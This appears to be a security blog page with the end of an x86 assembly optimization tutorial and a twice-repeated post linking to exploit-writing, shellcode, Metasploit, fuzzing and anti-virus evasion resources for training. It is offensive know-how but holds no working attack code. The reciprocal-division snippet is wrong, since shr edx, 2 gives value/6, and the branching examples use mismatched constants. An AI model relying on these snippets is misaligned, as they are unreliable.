lea eax, DWORD PTR [edx+edx] ----> lea is what the processor uses to make quick additions and shifts
add eax, eax
add eax, eax
add eax, eax
add eax, eax
As you can see, the first line will add your variable which is stored in edx with itself, then store the result in eax. Then the code will add eax with itself 4 times, resulting in 32 times the original edx value.
** Division **
Division is by far the slowest of the arithmical operations of a processor. Division is upwards 50 cycles slower then Addition and Subtraction, each of which is less than 1 cycle. As a result, the CPU treats divisions differently and attempts to streamline this operation using 'Reciprocal Division'. This is not ALWAYS possible, as is the case with unknown divisors, however whenever possible, reciprocal division is sought after. An example of a typical reciprocal-division that is dividing our value by 3 is:
mov ecx, eax ---> moves our number into ecx
mov eax ,0xaaaaaaab ---> moves 2/3 into eax
mul ecx ---> multiplies ecx by eax, so our value * (2/3)
shr edx, 2 ---> then divides our value by 2, so value * (2/3) / 2 = value * (1/3)
mov eax, edx ---> then moves our divided value back into eax
What is that 0xaaaaaab you might be asking? Well that is how Reciprocal-Division is used. In the above code, the function is dividing the value by 3. It is combining a reciprocal 0xaaaaaab, whose value in fractional is 2/3, with another divisor of 2, which comes out to being divided by 3. (2/3) / 2 = (1/3). Combining a fraction with a simple divisor, such as a binary shift, the CPU can create a division as efficiently as possible.
Branching Optimization:
** Branching **
Optimization and efficiency aren't only restricted to mathematical operations. Code segments such as branching can also be modified to operate more efficiently. The following is an example of more efficient/less efficient using a simple IF-OR statement like the one shown earlier in the article.
--- less efficient ---
cmp [variable], 10
je Function
cmp [variable2], 365
je Function
jmp Afterfunction
Call Function
Afterfunction...
--- more efficient ---
cmp [variable], 100
je Function
cmp [variable2], 365
jne Afterfunction
call Function
Afterfunction...
As you can see both codes execute the same branching conditional, however the section on the right has less instructions, and is therefore more efficient. The same can be said for pretty much all sections of code, there is almost always a way to make the code more efficient.
And that's it for the first installation. Hopefully you all enjoyed it. Comments and suggestions are welcome. Until next time,
padraignix
FirstPost
Ironically my first post will consist of me sending you to a hundred other sites...
Let me explain. I am one for giving credit where it is due, so in effect thats what i intend to do with my first post here. Im gonna suggest places that have helped me along the way. I will try to keep them somewhat organized, but some of them may end up not having a perfect spot.
I want to take this opportunity to thank all those who helped me along the way, thanks to those who have dealt with my maniac addiction to Network Security, and the like. I may have annoyed you, and i may still be annoying you, with questions followed by more and more questions...but know this, it does not go unappreciated.
Network scanning and enumeration:
http://nmap.org/
Nmap Cheat Sheet
That says it all, very useful.
http://www.unicornscan.org/
Another great tool for network enumeration.
Buffer Overflows:
This has recently become my favorite topic of research/conversation.
http://en.wikipedia.org/wiki/Buffer_overflow
So you can get an idea of what a buffer overflow really is.
http://en.wikipedia.org/wiki/Assembly_language
Your definately gonna need atleast a minor grasp of assembly.
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
And this is where the fun starts. This guy Lupin, has put out some good guides and has even created a "Vulnerable Server" especially for people to use for training. Give his blog a nice spot on you BookMarks tab. Youll be pleased you did.
http://www.tenouk.com/Bufferoverflowc/stackbasedbufferoverflow.html
Another great spot to learn a few things.
http://www.hackerscenter.com/index.php?/Downloads/Library/Application-Security/View-category.html
Another amazing resource.
Things your gonna need and how to use them.
http://www.immunityinc.com/products-immdbg.shtml
Immunity Debugger, this is my personal favorite. But try to play around with a few and find which you like the best.
http://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/
Good place to learn some of the usage and options that come along with Immunity
http://www.ollydbg.de/
Another option instead of Immuntiy.
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Corelan has a whole series of tutorials devoted to Exploit writing. I suggest you nestle this into your bookmarks. I personally am constantly going back to find something else useful that i had missed before.
And i could not go on without mentioning SecurityTube.net not only does Vivek have an entire video series devoted to Buffer Overflows, but also many other things. I will link to his site several times.
http://www.securitytube.net/groups?operation=view&groupId=7
ShellCode
Your gonna need some shell code around to get your exploit on. So load up, here is some places to start. Also dont forget, you can generate shell code through msfpayload / msfencode.
http://www.shell-storm.org/shellcode/
http://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
Another great tutorial from Corelan
http://projectshellcode.com/?q=node/12
An entire Database for dedicated to shell code.
Metasploit
I believe it was HD Moore who said that Metasploit is the fastest way to go from boot to remote root. That statement is so true. This is a great framework. So useful with its Auxiliary modules, exploitation modules, and post exploitation. Tis amazing! I would suggest getting to know the framework very well.
http://metasploit.com/
Metasploit is available for Windows and Linux variations. I suggest spending a bit of time here.
http://www.securitytube.net/groups?operation=view&groupId=8
Again i link to Securitytube.net, this is another entire series that Vivek has put together on Metasploit, from basic commands and scanning to post exploitation and cleanup.
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Offensive-security has put out a great and free resource for getting your feet wet with Metasploit. Check it out. While your there, browse over to the training courses that Muts offers there.
http://www.irongeek.com/i.php?page=videos/metasploit-class
This is Adrian Crenshaws website, he and Relik, pureh@te and some others put on a free training session. And now there also giving out the videos from it. This link will take you to the options for download or streaming. I recommend checking it out. He has some great guides and tutorials.
ReverseEngineering
Vivek makes another appearance on my list of places to visit.
http://www.securitytube.net/video/572
http://www.woodmann.com/crackz/
Everything Reverse Engineering
http://pentest.cryptocity.net/reverse-engineering/
For those of us who like videos.
http://tuts4you.com/download.php?list.17
An entire database of Reverse Engineering tuts. Also, i need to mention if you download the reversing with Lena pack. There are several "CrackMe" programs along with the interactive tutorials to test you new found skills on.
Exploit Databases
Your going to need a friend to call on when you need to know if a particular service or piece of software is vulnerable...heres a list of friends to put in for all your phone-a-friend needs.
http://www.exploit-db.com/
Great place to start looking for your vulnerable software. Also sometimes there is an option to download the exploitable software or the like to aid in the exploit development process.
http://packetstormsecurity.org/files/tags/exploit/
Another place to look...
http://www.cvedetails.com/
For the more professional hacker in you.
http://itunes.apple.com/app/iassurance/id351884692?mt=8
An iphone app for searching down vulnerabilities even while on the move.
Fuzzing
http://www.fuzzware.net/tutorial-1-basic-fuzzing
To start you off with your fuzzing needs.
http://www.thetazzone.com/tutorial-application-fuzzing/
Some more fuzzing resources.
http://peachfuzzer.com/TutorialNetworkServer
For learning to fuzz with Peach. Although not yet officially supported this is useable on Backtrack by using Wine.
https://www.owasp.org/index.php/Fuzzing_with_WebScarab
OWASP put out a great resource for using WebScarab to fuzz. Check it out.
http://www.youtube.com/watch?v=6sooEScW07Y
A good little video explaining usage of the Sulley fuzzing framework.
Vulnerable By Design
After you have learned all these nasty skills, you need a place to put it into action. You need to train for war without going to jail. Here is how. Vulnerable by design, these are VMs that you can run inside VMWare or VirtualBox, or even boot as live CD...then attack attack attack, without harming your system. These are great.
http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html
This is g0tmi1ks blog, this link will take you directly to the his vulnerable by design post. I have yet to find anything as extensive a collection as his. Please stick around on his site for his videos on exploiting the VMs and many other things.
http://samhacked.blogspot.com/2011/07/pentest-lab-vulnerable-servers.html
Another quick selection of vulnerable by design live CDs and VMs.
http://www.thoughtpolice.co.uk/
This is a HUGE selection of VMs in case you want to make your own vulnerable by design or just need a virtual machine to fool with.
Places i visit often and or find interesting.
http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3
Want to avoid anti-virus. irongeek has an amazing tutorial for this. Forget buying crypters or paying for the service. Learn it yourself.
http://www.secmaniac.com/
I havent mentioned the social engineering toolkit as of yet. But here is the blog from the man who designed it. Certainly worth checking out. Also quick side not, he is co-sponsoring DerbyCon in lousiville late this year. Here is a link to the details.
http://www.derbycon.com/
Make sure that you glance at the presenters. Its a star lineup and sure to be a great event.
http://www.offensive-security.com/
This is a great place to continue your education into pentesting, make sure you check out the online and live training options.
http://www.backtrack-linux.org/forums/
Backtrack linux forums is a wealth of knowledge. Make sure to get yourself an account and add to the community.
http://www.backtrack-linux.org/downloads/
For download backtrack 5. Great pentesting OS, so much so it has replaced my main operating system.
http://www.backtrack-linux.org/wiki/index.php/Main_Page
Think Wikapedia except for all things Backtrack. Woot
Python
http://en.wikibooks.org/wiki/Subject:Python_programming_language
Im knee deep in Python on a daily basis. Heres where i go for all things Python.
http://learnpythonthehardway.org/book/
And
http://www.onlinecomputerbooks.com/free-python-books.php
And I strongly recommend this book.
http://oreilly.com/catalog/9781593271923
A great post for privilege escalation in Linux.
http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html
A video showing how to use Metasploit as a payload for your post exploitation exploitations.
http://www.securitytube.net/video/711
Several good YouTube videos on different aspects of penetration testing.
http://www.youtube.com/user/xsploitedsecurity
A ton of videos of Defcon, Schmoocon, BlackHat, etc etc presentations. A very extensive list. I would bookmark this as its not only educational, but very entertaining.
http://www.youtube.com/user/ChRiStIaAn008
A few more books i can recommend:
http://www.amazon.com/Kingpin-Hacker-Billion-Dollar-Cybercrime-Underground/dp/0307588688
If you want an exciting book to read, thats also teaching you a few things along the way. Then this book is for you. Written by Kevin Poulsen who is a reformed hacker himself and currently runs a blog over at Wired.com Its always a good read. Check it out at:
http://www.wired.com/threatlevel/
Recently Relik, Muts, Jim Gorman, and Devon Kearns released this book, its very informative. Get it here:
http://nostarch.com/metasploit.htm
Download a sample chapter here:
http://www.nostarch.com/download/metasploit_ch8.pdf
Download the vulnerable examples discussed in the book here:
http://www.secmaniac.com/files/nostarch1.zip
Now this is not a complete or perfect list. Although I will be editing and adding to as things progress, it will never fit perfectly for all your needs. I encourage you to research research research. You will learn so much on the quest to find that one small nugget of info your looking for. And for that i give you this final link,
http://www.google.com
Myself and my cohort Padraignix will be adding content, and there will certainly be our own tutorials and guides. But we will not be providing a step-by-script-kiddie-step tutorial. With copy and paste remote exploit potential. We will be doing our best to keep this informational and professional. Saying that, I would like to invite anyone to comment, correct me in any place i was wrong. If you would like to see your site and or tutorial on here, just let us know and we will make it happen. Also if anyone has any great resources of web-app testing, please let me know. As i have not dealt with this much. Thanks for reading...
pop
pop
ret g11tch
Let me explain. I am one for giving credit where it is due, so in effect thats what i intend to do with my first post here. Im gonna suggest places that have helped me along the way. I will try to keep them somewhat organized, but some of them may end up not having a perfect spot.
I want to take this opportunity to thank all those who helped me along the way, thanks to those who have dealt with my maniac addiction to Network Security, and the like. I may have annoyed you, and i may still be annoying you, with questions followed by more and more questions...but know this, it does not go unappreciated.
Network scanning and enumeration:
http://nmap.org/
Nmap Cheat Sheet
That says it all, very useful.
http://www.unicornscan.org/
Another great tool for network enumeration.
Buffer Overflows:
This has recently become my favorite topic of research/conversation.
http://en.wikipedia.org/wiki/Buffer_overflow
So you can get an idea of what a buffer overflow really is.
http://en.wikipedia.org/wiki/Assembly_language
Your definately gonna need atleast a minor grasp of assembly.
http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
And this is where the fun starts. This guy Lupin, has put out some good guides and has even created a "Vulnerable Server" especially for people to use for training. Give his blog a nice spot on you BookMarks tab. Youll be pleased you did.
http://www.tenouk.com/Bufferoverflowc/stackbasedbufferoverflow.html
Another great spot to learn a few things.
http://www.hackerscenter.com/index.php?/Downloads/Library/Application-Security/View-category.html
Another amazing resource.
Things your gonna need and how to use them.
http://www.immunityinc.com/products-immdbg.shtml
Immunity Debugger, this is my personal favorite. But try to play around with a few and find which you like the best.
http://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/
Good place to learn some of the usage and options that come along with Immunity
http://www.ollydbg.de/
Another option instead of Immuntiy.
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Corelan has a whole series of tutorials devoted to Exploit writing. I suggest you nestle this into your bookmarks. I personally am constantly going back to find something else useful that i had missed before.
And i could not go on without mentioning SecurityTube.net not only does Vivek have an entire video series devoted to Buffer Overflows, but also many other things. I will link to his site several times.
http://www.securitytube.net/groups?operation=view&groupId=7
ShellCode
Your gonna need some shell code around to get your exploit on. So load up, here is some places to start. Also dont forget, you can generate shell code through msfpayload / msfencode.
http://www.shell-storm.org/shellcode/
http://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
Another great tutorial from Corelan
http://projectshellcode.com/?q=node/12
An entire Database for dedicated to shell code.
Metasploit
I believe it was HD Moore who said that Metasploit is the fastest way to go from boot to remote root. That statement is so true. This is a great framework. So useful with its Auxiliary modules, exploitation modules, and post exploitation. Tis amazing! I would suggest getting to know the framework very well.
http://metasploit.com/
Metasploit is available for Windows and Linux variations. I suggest spending a bit of time here.
http://www.securitytube.net/groups?operation=view&groupId=8
Again i link to Securitytube.net, this is another entire series that Vivek has put together on Metasploit, from basic commands and scanning to post exploitation and cleanup.
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Offensive-security has put out a great and free resource for getting your feet wet with Metasploit. Check it out. While your there, browse over to the training courses that Muts offers there.
http://www.irongeek.com/i.php?page=videos/metasploit-class
This is Adrian Crenshaws website, he and Relik, pureh@te and some others put on a free training session. And now there also giving out the videos from it. This link will take you to the options for download or streaming. I recommend checking it out. He has some great guides and tutorials.
ReverseEngineering
Vivek makes another appearance on my list of places to visit.
http://www.securitytube.net/video/572
http://www.woodmann.com/crackz/
Everything Reverse Engineering
http://pentest.cryptocity.net/reverse-engineering/
For those of us who like videos.
http://tuts4you.com/download.php?list.17
An entire database of Reverse Engineering tuts. Also, i need to mention if you download the reversing with Lena pack. There are several "CrackMe" programs along with the interactive tutorials to test you new found skills on.
Exploit Databases
Your going to need a friend to call on when you need to know if a particular service or piece of software is vulnerable...heres a list of friends to put in for all your phone-a-friend needs.
http://www.exploit-db.com/
Great place to start looking for your vulnerable software. Also sometimes there is an option to download the exploitable software or the like to aid in the exploit development process.
http://packetstormsecurity.org/files/tags/exploit/
Another place to look...
http://www.cvedetails.com/
For the more professional hacker in you.
http://itunes.apple.com/app/iassurance/id351884692?mt=8
An iphone app for searching down vulnerabilities even while on the move.
Fuzzing
http://www.fuzzware.net/tutorial-1-basic-fuzzing
To start you off with your fuzzing needs.
http://www.thetazzone.com/tutorial-application-fuzzing/
Some more fuzzing resources.
http://peachfuzzer.com/TutorialNetworkServer
For learning to fuzz with Peach. Although not yet officially supported this is useable on Backtrack by using Wine.
https://www.owasp.org/index.php/Fuzzing_with_WebScarab
OWASP put out a great resource for using WebScarab to fuzz. Check it out.
http://www.youtube.com/watch?v=6sooEScW07Y
A good little video explaining usage of the Sulley fuzzing framework.
Vulnerable By Design
After you have learned all these nasty skills, you need a place to put it into action. You need to train for war without going to jail. Here is how. Vulnerable by design, these are VMs that you can run inside VMWare or VirtualBox, or even boot as live CD...then attack attack attack, without harming your system. These are great.
http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html
This is g0tmi1ks blog, this link will take you directly to the his vulnerable by design post. I have yet to find anything as extensive a collection as his. Please stick around on his site for his videos on exploiting the VMs and many other things.
http://samhacked.blogspot.com/2011/07/pentest-lab-vulnerable-servers.html
Another quick selection of vulnerable by design live CDs and VMs.
http://www.thoughtpolice.co.uk/
This is a HUGE selection of VMs in case you want to make your own vulnerable by design or just need a virtual machine to fool with.
Places i visit often and or find interesting.
http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3
Want to avoid anti-virus. irongeek has an amazing tutorial for this. Forget buying crypters or paying for the service. Learn it yourself.
http://www.secmaniac.com/
I havent mentioned the social engineering toolkit as of yet. But here is the blog from the man who designed it. Certainly worth checking out. Also quick side not, he is co-sponsoring DerbyCon in lousiville late this year. Here is a link to the details.
http://www.derbycon.com/
Make sure that you glance at the presenters. Its a star lineup and sure to be a great event.
http://www.offensive-security.com/
This is a great place to continue your education into pentesting, make sure you check out the online and live training options.
http://www.backtrack-linux.org/forums/
Backtrack linux forums is a wealth of knowledge. Make sure to get yourself an account and add to the community.
http://www.backtrack-linux.org/downloads/
For download backtrack 5. Great pentesting OS, so much so it has replaced my main operating system.
http://www.backtrack-linux.org/wiki/index.php/Main_Page
Think Wikapedia except for all things Backtrack. Woot
Python
http://en.wikibooks.org/wiki/Subject:Python_programming_language
Im knee deep in Python on a daily basis. Heres where i go for all things Python.
http://learnpythonthehardway.org/book/
And
http://www.onlinecomputerbooks.com/free-python-books.php
And I strongly recommend this book.
http://oreilly.com/catalog/9781593271923
A great post for privilege escalation in Linux.
http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html
A video showing how to use Metasploit as a payload for your post exploitation exploitations.
http://www.securitytube.net/video/711
Several good YouTube videos on different aspects of penetration testing.
http://www.youtube.com/user/xsploitedsecurity
A ton of videos of Defcon, Schmoocon, BlackHat, etc etc presentations. A very extensive list. I would bookmark this as its not only educational, but very entertaining.
http://www.youtube.com/user/ChRiStIaAn008
A few more books i can recommend:
http://www.amazon.com/Kingpin-Hacker-Billion-Dollar-Cybercrime-Underground/dp/0307588688
If you want an exciting book to read, thats also teaching you a few things along the way. Then this book is for you. Written by Kevin Poulsen who is a reformed hacker himself and currently runs a blog over at Wired.com Its always a good read. Check it out at:
http://www.wired.com/threatlevel/
Recently Relik, Muts, Jim Gorman, and Devon Kearns released this book, its very informative. Get it here:
http://nostarch.com/metasploit.htm
Download a sample chapter here:
http://www.nostarch.com/download/metasploit_ch8.pdf
Download the vulnerable examples discussed in the book here:
http://www.secmaniac.com/files/nostarch1.zip
Now this is not a complete or perfect list. Although I will be editing and adding to as things progress, it will never fit perfectly for all your needs. I encourage you to research research research. You will learn so much on the quest to find that one small nugget of info your looking for. And for that i give you this final link,
http://www.google.com
Myself and my cohort Padraignix will be adding content, and there will certainly be our own tutorials and guides. But we will not be providing a step-by-script-kiddie-step tutorial. With copy and paste remote exploit potential. We will be doing our best to keep this informational and professional. Saying that, I would like to invite anyone to comment, correct me in any place i was wrong. If you would like to see your site and or tutorial on here, just let us know and we will make it happen. Also if anyone has any great resources of web-app testing, please let me know. As i have not dealt with this much. Thanks for reading...
pop
pop
ret g11tch
Subscribe to:
Posts (Atom)